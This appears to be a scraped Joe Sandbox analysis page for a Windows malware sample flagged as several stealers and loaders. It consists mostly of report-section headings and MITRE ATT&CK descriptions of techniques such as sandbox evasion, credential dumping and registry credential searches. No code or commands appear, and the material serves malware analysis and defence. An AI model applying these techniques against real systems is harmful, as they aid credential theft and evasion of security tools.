Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Threatname: Vidar

Threatname: SmokeLoader

Threatname: Amadey

Threatname: Cryptbot

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Change of critical system settings

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Bitcoin Miner

Compliance

Change of critical system settings

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Windows Analysis Report
SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre